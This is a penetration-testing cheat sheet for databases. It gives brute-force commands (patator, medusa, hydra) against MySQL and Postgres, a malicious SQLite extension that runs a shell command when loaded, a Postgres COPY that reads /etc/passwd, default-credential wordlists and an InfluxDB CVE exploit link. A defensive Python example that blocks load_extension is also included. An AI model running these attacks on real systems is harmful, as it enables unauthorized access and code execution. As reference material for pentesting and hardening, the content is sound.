# Database

***

* [DynamoDB](#dynamodb)
* [Influx DB](#influx-db)
* [MySQL](#mysql)
* [Postgres](#postgres)
* [SQLite](#sqlite)

## Bruteforce

#### Patator

```bash
patator pgsql_login user=user password=FILE0 0=/usr/share/wordlists/rockyou.txt host=ip -x ignore:fgrep='failed'
```

#### Medusa

```bash
medusa -h ip -u user -P pass.txt -M mysql -n 3306
```

#### Hydra

```bash
hydra -l user -P pass.txt ip mysql
```

## MySQL

> Port: 3306

#### Connect to MySQL

```bash
mysql -h localhost -u myname -p
```

#### Show Info

```sql
SHOW DATABASES;
USE db_name;
SHOW TABLES;
```

#### Select

```sql
SELECT * FROM table_name;
```

## SQLite

#### Open

```bash
sqlite3 database.sqlite3
```

Or open the file in VS Code.

#### Show info

```
.databases
.tables
```

#### Load extension

> Sometimes you have to load an extension to gain some privileges. Note: the function name needs to be `sqlite3_<extension_name>_init`.

```c
// gcc -s -g -fPIC -shared my_extension.c -o my_extension.so
#include <stdlib.h>
int sqlite3_my_extension_init(){
    system("id");
    return 0;
}
```

After that, you can load the extension in SQLite with:

```sql
SELECT load_extension('my_extension.so');
```
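Seen from the defender's side, an application that runs untrusted SQL can refuse `load_extension()` on its own connections. The following Python sketch is an added example, not part of the original cheat sheet; the helper names `lock_down`, `probe` and `audit` and the `.so` path are constructed for illustration.

```python
import sqlite3

def lock_down(conn, denied_log):
    """Refuse the SQL function load_extension() on this connection."""
    # Keep C-level extension loading off where this Python build exposes the switch.
    if hasattr(conn, "enable_load_extension"):
        conn.enable_load_extension(False)

    def authorizer(action, arg1, arg2, db_name, source):
        # For SQLITE_FUNCTION events, arg2 carries the function name.
        if action == sqlite3.SQLITE_FUNCTION and (arg2 or "").lower() == "load_extension":
            denied_log.append(arg2)  # record the attempt for later review
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK

    conn.set_authorizer(authorizer)

def probe(conn, sql):
    """Run sql; return None on success or the SQLite error text."""
    try:
        conn.execute(sql).fetchall()
        return None
    except sqlite3.Error as exc:
        return str(exc)

def audit():
    """Check a connection before and after hardening (constructed sample input)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE notes(body TEXT)")
    stmt = "SELECT load_extension('/nonexistent/constructed_example.so')"
    denied = []
    before = probe(conn, stmt)   # default state: extension loading is off
    lock_down(conn, denied)
    after = probe(conn, stmt)    # now rejected when the statement is prepared
    normal = probe(conn, "SELECT body FROM notes")  # ordinary queries still work
    conn.close()
    return before, after, normal, denied

if __name__ == "__main__":
    before, after, normal, denied = audit()
    print("before hardening:", before)
    print("after hardening: ", after)
    print("normal query error:", normal, "| denied calls:", denied)
```

The authorizer rejects the call while the statement is being prepared, so it holds even if other code later re-enables extension loading on the same connection.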

## Postgres

> Port: 5432

#### Wordlist Default Credentials

```path
/usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt
/usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt
```

#### Connect

```bash
psql -h ip -U username -d database -W
```

#### Show info

```
\l # list all databases
\dt # list all tables
```

#### Read File

```sql
create table hack(file TEXT);
COPY hack FROM '/etc/passwd';
select * from hack;
```

* [PostgreSQL Pentesting](https://medium.com/@lordhorcrux_/ultimate-guide-postgresql-pentesting-989055d5551e)

## Influx DB

[CVE-2019-20933 Influxdb](https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933)

```
> show databases # to display databases
> show field keys # field keys (like columns in sql)
> show measurements # to display measurements (like tables in sql)
{
  ...
  "results": [
    "values": [
        [
            "foo"
        ]
    ]
  ...
}
> select * from "foo" # display all content of the measurement (table) 'foo' (keep the double quotes)
```

## DynamoDB

See [this page](/hacksheet/wiki/cloud.md)


